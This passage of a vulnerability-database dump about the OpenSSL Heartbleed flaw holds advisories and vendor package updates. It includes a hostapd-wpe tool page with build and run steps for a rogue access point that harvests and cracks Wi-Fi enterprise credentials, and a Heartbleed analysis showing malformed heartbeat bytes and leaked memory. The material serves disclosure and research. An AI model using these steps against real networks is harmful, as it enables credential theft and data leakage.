2012\r\nanalyst-updater@h2072833:~# sudo reboot\r\n\r\nBroadcast message from analyst-updater@h2072833.ben-kenobi-server.net\r\n (/dev/pts/0) at 12:16 ...\r\n\r\nThe system is going down for reboot NOW!\r\n\r\n\r\n\r\nPicture(s):\r\nhttp://www.vulnerability-lab.com/resources/pictures/1.png\r\nhttp://www.vulnerability-lab.com/resources/pictures/2.png\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nVulnerability Laboratory [Research Team]\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, \r\neither expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-\r\nLab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business \r\nprofits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some \r\nstates do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation \r\nmay not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases \r\nor trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t - www.vulnerability-lab.com/register\r\nContact: admin@vulnerability-lab.com \t- support@vulnerability-lab.com \t - research@vulnerability-lab.com\r\nSection: video.vulnerability-lab.com \t- forum.vulnerability-lab.com \t\t - news.vulnerability-lab.com\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t - youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. \r\nPermission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other \r\nmedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and \r\nother information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), \r\nmodify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.\r\n\r\n \t\t\t\t \tCopyright \u00a9 2012 | Vulnerability Laboratory\r\n\r\n\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "n0where": [{"lastseen": "2018-10-04T02:31:46", "references": ["https://github.com/lgrangeia/cupid", "https://github.com/OpenSecurityResearch/hostapd-wpe"], "description": "## hostapd-wpe \u2013 Wireless Pwnage Edition \u2013 \n\n* * *\n\nhostapd-wpe is the replacement for [ FreeRADIUS-WPE ](<http://www.willhackforsushi.com/?page_id=37>) . It implements IEEE 802.1x Authenticator and Authentication Server impersonation attacks to obtain client credentials, establish connectivity to the client, and launch other attacks where applicable. \n\nhostapd-wpe supports the following EAP types for impersonation: \n\n 1. EAP-FAST/MSCHAPv2 (Phase 0) \n 2. PEAP/MSCHAPv2 \n 3. EAP-TTLS/MSCHAPv2 \n 4. EAP-TTLS/MSCHAP \n 5. EAP-TTLS/CHAP \n 6. EAP-TTLS/PAP \n\nOnce impersonation is underway, hostapd-wpe will return an EAP-Success message so that the client believes they are connected to their legitimate authenticator. For 802.11 clients, hostapd-wpe also implements [ Karma-style gratuitous probe ](<http://www.foofus.net/?page_id=115>) responses \u2013 by JoMo-Kun\u2019s patch for older versions of hostapd. hostapd-wpe also implements CVE-2014-0160 (Heartbleed) attacks against vulnerable clients \u2013 provided by the [ Cupid PoC: ](<https://github.com/lgrangeia/cupid>) hostapd-wpe logs all data to stdout and hostapd-wpe.log \n\nThe current hostapd-wpe.patch is for: hostapd-2.2.tar.gz \n\n## Quick Usage \n\nOnce hostapd-wpe.patch is applied, hostapd-wpe.conf will be created at /path/to/build/hostapd/hostapd-wpe.conf. See that file for more information. Note that /path/to/build/hostapd/hostapd-wpe.eap_users \nwill also be created, and hostapd-wpe is dependent on it. \n\n## Basic usage: \n \n \n hostapd-wpe hostapd-wpe.conf\n\nCredentials will be displayed on the screen and stored in hostapd-wpe.log \n\nAdditional WPE command line options are: \n\n * ** -s ** \u2013 Return EAP-Success messages after credentials are harvested \n * ** -k ** \u2013 Gratuitous probe responses (Karma mode) \n * ** -c ** \u2013 Attempt to exploit CVE-2014-0160 (Cupid mode) \n\n## Building \n \n \n $ git clone https://github.com/OpenSecurityResearch/hostapd-wpe\n\nUbuntu/Debian/Kali Building \n \n \n $ apt-get update\n $ apt-get install libssl-dev libnl-dev\n\nif you\u2019re using Kali install: \n \n \n $ apt-get install libssl-dev libnl-genl-3-dev\n\n## General \n\nNow apply the hostapd-wpe.patch: \n \n \n $ git clone https://github.com/OpenSecurityResearch/hostapd-wpe\n \n \n $ wget http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz\n $ tar -zxf hostapd-2.2.tar.gz\n $ cd hostapd-2.2\n $ patch -p1 < ../hostapd-wpe/hostapd-wpe.patch\n $ cd hostapd\n\nIf you\u2019re using Kali 2.0 edit .config file and uncomment: \n \n \n CONFIG_LIBNL32=y\n \n \n $ make\n\nCopy the certs directory and scripts from FreeRADIUS to ease that portion of things. You should just be able to: \n \n \n $ cd ../../hostapd-wpe/certs\n $ ./bootstrap\n\nthen finally just: \n \n \n $ cd ../../hostapd-2.2/hostapd\n $ sudo ./hostapd-wpe hostapd-wpe.conf\n\n## Running Access Point Impersonation Attacks: \n\nWith all of that complete, you can run hostapd. The patch will create a new hostapd-wpe.conf, which you\u2019ll likely need to modify in order to make it work for your attack. Once ready just run \n \n \n hostapd hostapd-wpe.conf\n\nLook in the output for the username/challenge/response. It\u2019ll be there and in a hostapd-wpe.log file in the directory you ran hostapd from for instance here are the EAP-FAST Phase 0 creds from stdout: \n \n \n username: jdslfkjs\n challenge: bc:87:6c:48:37:d3:92:6e\n response: 2d:00:61:59:56:06:02:dd:35:4a:0f:99:c8:6b:e1:fb:a3:04:ca:82:40:92:7c:f0\n\nand as always, we feed them into asleap to crack: \n \n \n # asleap -C bc:87:6c:48:37:d3:92:6e -R 2d:00:61:59:56:06:02:dd:35:4a:0f:99:c8:6b:e1:fb:a3:04:ca:82:40:92:7c:f0 -W wordlist\n asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>\n hash bytes: b1ca\n NT hash: e614b958df9df49ec094b8730f0bb1ca\n password: bradtest\n\nAlternatively MSCHAPv2 credentials are outputted in john the rippers NETNTLM format. \n\n## EAP-Success \n\nCertain EAP types do not require the server to authenticate itself, just to validate the client\u2019s submitted credentials. Since we\u2019re playing the authentication server, that means we can easily just return an EAP-Success message to the client regardless of what they send us. The client is happy because they\u2019ve connected, but unfortunately are unaware that they are connected to an unapproved authenticator. \n\nAt this point, the attacker can set up a dhcp server and give the client an IP and then do whatever they\u2019d like (e.g. redirect dns, launch attacks, MiTM, etc..) \n\nMSCHAPv2 protects against this by having the server prove knowledge of the password most supplicants adhere to this policy, but we return EAP-Success just in case. \n\n## Karma-Style Probes \n\nThis functionality simply waits for an client to send a directed probe, when it does, it assumes that SSID and responds to the client. Only applicable to 802.11 clients. \n\n## A note on MSCHAPv2 \n\nMicrosoft offers something called \u201cComputer Based Authentication\u201d. When a computer joins a domain it is assigned a password. This password is stored on the system and in active directory. We can harvest the MSCHAPv2 response from these systems but its going to take a lifetime to crack. Unless you\u2019re just trying to solve for the hash, and not the actual password \ud83d\ude42 \n\nOne other thing to note, if the client returns all zeros, it isnt joined to a domain. \n\n## Source && Download \n\n[  ](<https://github.com/OpenSecurityResearch/hostapd-wpe>)\n", "edition": 2, "reporter": "N0where", "published": "2016-04-12T22:19:39", "title": "Access Point Impersonation Attacks: hostapd-wpe", "type": "n0where", "enchantments": {"score": {"modified": "2018-10-04T02:31:46", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "tools", "cvelist": ["CVE-2014-0160"], "modified": "2016-04-12T22:19:39", "toolHref": "https://github.com/OpenSecurityResearch/hostapd-wpe", "id": "N0WHERE:76566", "href": "https://n0where.net/access-point-impersonation-attacks-hostapd-wpe", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "myhack58": [{"lastseen": "2016-11-02T19:48:51", "references": [], "description": "Author: yaoxi original source http://blog.wangzhan.360.cn/\n\nRecently, OpenSSL broke this year's most serious security vulnerability in the hacker community is named\u201cheart bleed\u201dvulnerability. 3 6 0 site Guard security team of the vulnerability analysis, the vulnerability is not only related to https at the beginning of the URL, but also includes indirect use of the OpenSSL code products and services, such as VPN, mail system, FTP tools and other products and services, and may even be related to some other security facilities of the source code.\n\nThe affected version\n\nOpenSSL1. 0. 1, The 1.0.1 a, 1.0.1 b, 1.0.1 c, 1.0.1 d, 1.0.1 e, 1.0.1 f, Beta 1 of OpenSSL 1.0.2 and other versions.\n\nVulnerability detail description: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n\nVulnerability description\n\nOpenSSL in the realization of the TLS and DTLS heartbeat processing logic, the presence of coding defects. OpenSSL's heartbeat processing logic does not detect a heartbeat packet in the length field and subsequent data fields are consistent, the attacker can take advantage of this, structural abnormalities of the data packet, to obtain the heartbeat data where the memory area of the subsequent data. These data may be contained in a certificate private key, user name, user password, user email and other sensitive information. The vulnerability allows an attacker read from memory up to 64KB of data.\n\nA few days ago of a vulnerability analysis of the articles the main focus in turn on HTTPS on the site, ordinary users may think that only the website their business will be affected by this vulnerability. From 3 6 0 websites guards Openssl effort loophole online testing platform(wangzhan. 3 6 0. cn/heartbleed)monitoring data that, effort to exploit the range of radiation has been from the open HTTPS site extends to the VPN system and the mail system, The current Total Domestic total 2 5 1 a VPN system and a 7 2 5 a mail system to the presence of the same vulnerability, including many government websites, key universities and related security vendors.\n\nIn order to better allow everyone to understand that the Openssl effort loophole in the end is which aspects of a problem, we use the OpenSSL lib library to write a does not depend on any business separate server program, a step-by-step the actual debug over the code, in order to prove that not only is the https site has a problem, as long as the use of the existence of the vulnerability in the OpenSSL libssl. so the gallery app there are security vulnerabilities that!\n\nThe test environment\n\nOS: CentOS release 6.4 (Final)\n\nOpenSSL: Version 1.0.1 f Do not open the OPENSSL_NO_HEARTBEATS compile options\n\nWrite a Server program: monitor port 9 8 7 6\n\nVulnerability testing\n\nUse the online python validation script https://gist.github.com/RixTox/10222402 test\n\nStructural abnormalities of the heartbeat data packet, mainly to add the exception of the length field value.\n\nTest one:\n\nHeartBeat Requst packet\n\nhb = h2bin(\u201d\u2019\n\n1 8 0 3 0 2 0 0 0 3\n\n0 1 2 0 0 0\n\n\u201d\u2019)\n\nBlue 0 1 represents the heartbeat packet of type request direction. The corresponding source code is #define TLS1_HB_REQUEST 1\n\nRed 2 0 0 0 indicates that the heartbeat request packet length field, accounting for two bytes, corresponding to the length value of 8 1 of 9 2 of.\n\nThe HeartBeat Response packet\n\n[root@server test]# python ssltest.py 127.0.0.1-p 9 8 7 6 > 1\n\nSending heartbeat request...\n\n... received message: type = 2 4, ver = 0 3 0 2, length = 8 2 1 1\n\nReceived heartbeat response:\n\nWARNING: server returned more data than it should \u2013 server is vulnerable!\n\nReceived heartbeat response:\n\n0 0 0 0: 0 2 2 0 0 0 D8 0 3 0 2 5 3 4 3 5B 9 0 9D 9B 7 2 0B BC 0C. .... SC[...r...\n\n0 0 1 0: BC 2B 9 2 A8 4 8 9 7 CF BD 3 9 0 4 CC 1 6 0A 8 5 0 3 9 0 .+.. H...9.......\n\n0 0 2 0: 9F 7 7 0 4 3 3 D4 DE 0 0 0 0 6 6 C0 1 4 C0 0A C0 2 2 C0 . w. 3.... f.....\".\n\n0 0 3 0: 2 1 0 0 3 9 0 0 3 8 0 0 8 8 0 0 8 7 C0 0F C0 0 5 0 0 3 5 0 0 !. 9. 8......... 5.\n\nBlue 0 2 represents the heartbeat packet type response direction.\n\nThe corresponding source code is #define TLS1_HB_RESPONSE 2\n\nRed 2 0 0 0 represented by the heartbeat response packet length field, accounting for two bytes, corresponding to the length value of 8 1 of 9 2 of. And the request packet length value.\n\nThe green part is the illegal access to cross-border data(which may include Username, Password, e-mail, internal network IP and other sensitive information).\n\nTest two:\n\nIn the test on the basis of one, modify the request heartbeat packets, the length field's value from 2 to 0 0 0 to 3 0 0 0\n\nHeartBeat Requst packet\n\nhb = h2bin(\"'\n\n1 8 0 3 0 2 0 0 0 3\n\n0 1 3 0 0 0\n\n\"')\n\n3 0 0 0 two bytes corresponding to the length 1 2 2 8 8 out of 8 1 9 2+4 0 9 6\uff09\n\nThe HeartBeat Response packet\n\n[root@server test]# python ssltest.py 127.0.0.1-p 9 8 7 6 > 1\n\nSending heartbeat request...\n\n... received message: type = 2 4, ver = 0 3 0 2, length = 1 2 3 0 7\n\nReceived heartbeat response:\n\nWARNING: server returned more data than it should \u2013 server is vulnerable!\n\nReceived heartbeat response:\n\n0 0 0 0: 0 2 3 0 0 0 D8 0 3 0 2 5 3 4 3 5B 9 0 9D 9B 7 2 0B BC 0C .0.... SC[...r...\n\n0 0 1 0: BC 2B 9 2 A8 4 8 9 7 CF BD 3 9 0 4 CC 1 6 0A 8 5 0 3 9 0 .+.. H...9.......\n\n0 0 2 0: 9F 7 7 0 4 3 3 D4 DE 0 0 0 0 6 6 C0 1 4 C0 0A C0 2 2 C0 . w. 3.... f.....\".\n\n0 0 3 0: 2 1 0 0 3 9 0 0 3 8 0 0 8 8 0 0 8 7 C0 0F C0 0 5 0 0 3 5 0 0 !. 9. 8......... 5.\n\nTwo test cases, the response of the length of the length value is always greater than the request length of the multi-out 1 9 a byte, why?\n\nBecause, TLS and DTLS in dealing with the type of TLS1_HB_REQUEST the heartbeat request packet logic, from the heap space on the application memory size, there are 4 part of the decision type+length+request data length+pad, where type,length,pad the field into account for 1byte and 2byte, the 16byte, so the response data is always better than the request of many out 19byte it.\n\nSource code analysis\n\nOutline\n\nThe vulnerability is mainly a memory leak problem, and the fundamental is because OpenSSL in the handling heartbeat request packet, not to the length field for 2byte, you can identify the data length is 64KB and the subsequent data fields do compliance testing. Generate a heartbeat response packet, the direct use of a length corresponding to the length from heap space application memory, not only is the real request data is much smaller than the length identified in length.\n\nRelated to parsing the source code description\n\nThe vulnerability exists in the source file there are two ssl/d1_both. c and ssl/t1_lib. c.\n\nHeartbeat processing logic, respectively, is dtls1_process_heartbeat and tls1_process_heartbeat two functions.\n\ndtls1_process_heartbeat function processing logic:\n\nStep1. Get heartbeat request packet corresponding to the SSLv3 record the data in the pointer field pointing to the request of the requested data portion.\n\nunsigned char *p = &s->s3->rrec. data[0];\n\nrecord the data format should contain three fields: type, length, data; respectively accounted for 1byte and 2byte, the length of the actual value.\n\n**[1] [[2]](<44409_2.htm>) [next](<44409_2.htm>)**\n", "edition": 1, "reporter": "\u4f5a\u540d", "published": "2014-04-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "myhack58", "title": "Than imagined more terror! OpenSSL\u201ceffort\u201dvulnerability in-depth analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-10T00:00:00", "id": "MYHACK58:62201444409", "href": "http://www.myhack58.com/Article/html/3/62/2014/44409.htm", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "suse": [{"lastseen": "2016-09-04T11:46:33", "references": ["https://bugzilla.novell.com/872299"], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1e-1.44.1", "arch": "x86_64", "packageFilename": "libopenssl-devel-32bit-1.0.1e-1.44.1.x86_64.rpm", "packageName": "libopenssl-devel-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1e-11.32.1", "arch": "i586", "packageFilename": "openssl-debugsource-1.0.1e-11.32.1.i586.rpm", "packageName": "openssl-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1e-1.44.1", "arch": "noarch", "packageFilename": "openssl-doc-1.0.1e-1.44.1.noarch.rpm", "packageName": "openssl-doc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1e-11.32.1", "arch": "x86_64", "packageFilename": "libopenssl1_0_0-debuginfo-32bit-1.0.1e-11.32.1.x86_64.rpm", "packageName": "libopenssl1_0_0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1e-11.32.1", "arch": "x86_64", "packageFilename": "libopenssl-devel-32bit-1.0.1e-11.32.1.x86_64.rpm", "packageName": "libopenssl-devel-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1e-1.44.1", "arch": "x86_64", "packageFilename": "libopenssl1_0_0-debuginfo-32bit-1.0.1e-1.44.1.x86_64.rpm", "packageName": "libopenssl1_0_0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1e-1.44.1", "arch": "i586", "packageFilename": "openssl-debugsource-1.0.1e-1.44.1.i586.rpm", "packageName": "openssl-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1e-11.32.1", "arch": "i586", "packageFilename": "openssl-debuginfo-1.0.1e-11.32.1.i586.rpm", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1e-1.44.1", "arch": "x86_64", "packageFilename": "openssl-debugsource-1.0.1e-1.44.1.x86_64.rpm", "packageName": "openssl-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1e-1.44.1", "arch": "i586", "packageFilename": "libopenssl1_0_0-1.0.1e-1.44.1.i586.rpm", "packageName": "libopenssl1_0_0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1e-11.32.1", "arch": "x86_64", "packageFilename": "libopenssl-devel-1.0.1e-11.32.1.x86_64.rpm", "packageName": "libopenssl-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1e-11.32.1", "arch": "i586", "packageFilename": "libopenssl1_0_0-debuginfo-1.0.1e-11.32.1.i586.rpm", "packageName": "libopenssl1_0_0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1e-1.44.1", "arch": "i586", "packageFilename": "libopenssl1_0_0-debuginfo-1.0.1e-1.44.1.i586.rpm", "packageName": "libopenssl1_0_0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1e-1.44.1", "arch": "x86_64", "packageFilename": "libopenssl1_0_0-debuginfo-1.0.1e-1.44.1.x86_64.rpm", "packageName": "libopenssl1_0_0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1e-11.32.1", "arch": "x86_64", "packageFilename": "libopenssl1_0_0-32bit-1.0.1e-11.32.1.x86_64.rpm", "packageName": "libopenssl1_0_0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1e-11.32.1", "arch": "i586", "packageFilename": "libopenssl1_0_0-1.0.1e-11.32.1.i586.rpm", "packageName": "libopenssl1_0_0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1e-11.32.1", "arch": "x86_64", "packageFilename": "openssl-debuginfo-1.0.1e-11.32.1.x86_64.rpm", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1e-11.32.1", "arch": "noarch", "packageFilename": "openssl-doc-1.0.1e-11.32.1.noarch.rpm", "packageName": "openssl-doc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1e-1.44.1", "arch": "i586", "packageFilename": "openssl-debuginfo-1.0.1e-1.44.1.i586.rpm", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1e-1.44.1", "arch": "x86_64", "packageFilename": "openssl-debuginfo-1.0.1e-1.44.1.x86_64.rpm", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1e-11.32.1", "arch": "i586", "packageFilename": "libopenssl-devel-1.0.1e-11.32.1.i586.rpm", "packageName": "libopenssl-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1e-1.44.1", "arch": "i586", "packageFilename": "openssl-1.0.1e-1.44.1.i586.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1e-1.44.1", "arch": "x86_64", "packageFilename": "libopenssl1_0_0-32bit-1.0.1e-1.44.1.x86_64.rpm", "packageName": "libopenssl1_0_0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1e-1.44.1", "arch": "x86_64", "packageFilename": "libopenssl-devel-1.0.1e-1.44.1.x86_64.rpm", "packageName": "libopenssl-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1e-1.44.1", "arch": "x86_64", "packageFilename": "libopenssl1_0_0-1.0.1e-1.44.1.x86_64.rpm", "packageName": "libopenssl1_0_0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1e-11.32.1", "arch": "i586", "packageFilename": "openssl-1.0.1e-11.32.1.i586.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1e-1.44.1", "arch": "i586", "packageFilename": "libopenssl-devel-1.0.1e-1.44.1.i586.rpm", "packageName": "libopenssl-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1e-11.32.1", "arch": "x86_64", "packageFilename": "openssl-debugsource-1.0.1e-11.32.1.x86_64.rpm", "packageName": "openssl-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1e-11.32.1", "arch": "x86_64", "packageFilename": "libopenssl1_0_0-1.0.1e-11.32.1.x86_64.rpm", "packageName": "libopenssl1_0_0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1e-11.32.1", "arch": "x86_64", "packageFilename": "libopenssl1_0_0-debuginfo-1.0.1e-11.32.1.x86_64.rpm", "packageName": "libopenssl1_0_0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1e-11.32.1", "arch": "x86_64", "packageFilename": "openssl-1.0.1e-11.32.1.x86_64.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1e-1.44.1", "arch": "x86_64", "packageFilename": "openssl-1.0.1e-1.44.1.x86_64.rpm", "packageName": "openssl", "operator": "lt"}], "description": "This openssl update fixes one security issue:\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).\n\n", "edition": 1, "reporter": "Suse", "published": "2014-04-08T13:04:15", "title": "update for openssl (important)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T13:04:15", "id": "OPENSUSE-SU-2014:0492-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00004.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:47:30", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-16.el6_5.7", "arch": "x86_64", "packageFilename": "openssl-perl-1.0.1e-16.el6_5.7.x86_64.rpm", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-16.el6_5.7", "arch": "i686", "packageFilename": "openssl-static-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl-static", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-16.el6_5.7", "arch": "i686", "packageFilename": "openssl-devel-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-16.el6_5.7", "arch": "i686", "packageFilename": "openssl-devel-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-16.el6_5.7", "arch": "src", "packageFilename": "openssl-1.0.1e-16.el6_5.7.src.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-16.el6_5.7", "arch": "src", "packageFilename": "openssl-1.0.1e-16.el6_5.7.src.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-16.el6_5.7", "arch": "i686", "packageFilename": "openssl-perl-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-16.el6_5.7", "arch": "x86_64", "packageFilename": "openssl-1.0.1e-16.el6_5.7.x86_64.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-16.el6_5.7", "arch": "x86_64", "packageFilename": "openssl-devel-1.0.1e-16.el6_5.7.x86_64.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-16.el6_5.7", "arch": "x86_64", "packageFilename": "openssl-static-1.0.1e-16.el6_5.7.x86_64.rpm", "packageName": "openssl-static", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-16.el6_5.7", "arch": "i686", "packageFilename": "openssl-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-16.el6_5.7", "arch": "i686", "packageFilename": "openssl-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl", "operator": "lt"}], "description": "[1.0.1e-16.7]\n- fix CVE-2014-0160 - information disclosure in TLS heartbeat extension", "edition": 3, "reporter": "Oracle", "published": "2014-04-07T00:00:00", "title": "openssl security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-07T00:00:00", "id": "ELSA-2014-0376", "href": "http://linux.oracle.com/errata/ELSA-2014-0376.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "atlassian": [{"lastseen": "2018-08-31T02:43:11", "references": [], "description": "{panel:bgColor=#e7f4fa}\n *NOTE:* This suggestion is for *JIRA Server*. Using *JIRA Cloud*? [See the corresponding suggestion|http://jira.atlassian.com/browse/JRACLOUD-38927].\n {panel}\n\n\r\n{quote}\r\n7 new vulnerabilities were announced for OpenSSL on 5 June 2014. These vulnerabilities affect Tomcat Native, which ships with the Windows Installer versions of JIRA.\r\n\r\nSo please update your JIRA Windows Installers to include a patched version of Tomcat Native DLL's, once these become available.\r\n{quote}\r\n\r\n*Note*\r\nThis is related to the Heartbleed vulnerability. Does not affect JIRA if recommended configuration is followed http://blogs.atlassian.com/2014/04/openssl-cve-2014-0160-atlassian/", "edition": 7, "reporter": "michael.litwak", "published": "2014-06-26T19:39:26", "title": "Update Tomcat Native DLL in JIRA Installer", "type": "atlassian", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "JIRA Server (including JIRA Core)", "version": "6.1.7", "operator": "le"}], "cvelist": ["CVE-2014-0160"], "modified": "2018-02-08T06:54:15", "id": "ATLASSIAN:JRASERVER-38927", "href": "https://jira.atlassian.com/browse/JRASERVER-38927", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-11-21T08:44:46", "references": [], "description": "{panel:bgColor=#e7f4fa}\n *NOTE:* This suggestion is for *JIRA Cloud*. Using *JIRA Server*? [See the corresponding suggestion|http://jira.atlassian.com/browse/JRASERVER-38927].\n {panel}\n\n\n{quote}\n7 new vulnerabilities were announced for OpenSSL on 5 June 2014. These vulnerabilities affect Tomcat Native, which ships with the Windows Installer versions of JIRA.\n\nSo please update your JIRA Windows Installers to include a patched version of Tomcat Native DLL's, once these become available.\n{quote}\n\n*Note*\nThis is related to the Heartbleed vulnerability. Does not affect JIRA if recommended configuration is followed http://blogs.atlassian.com/2014/04/openssl-cve-2014-0160-atlassian/", "edition": 7, "reporter": "michael.litwak", "published": "2014-06-26T19:39:26", "title": "Update Tomcat Native DLL in JIRA Installer", "type": "atlassian", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Jira Cloud (including JIRA Core)", "version": "6.1.7", "operator": "le"}], "cvelist": ["CVE-2014-0160"], "modified": "2018-09-19T04:53:02", "id": "ATLASSIAN:JRACLOUD-38927", 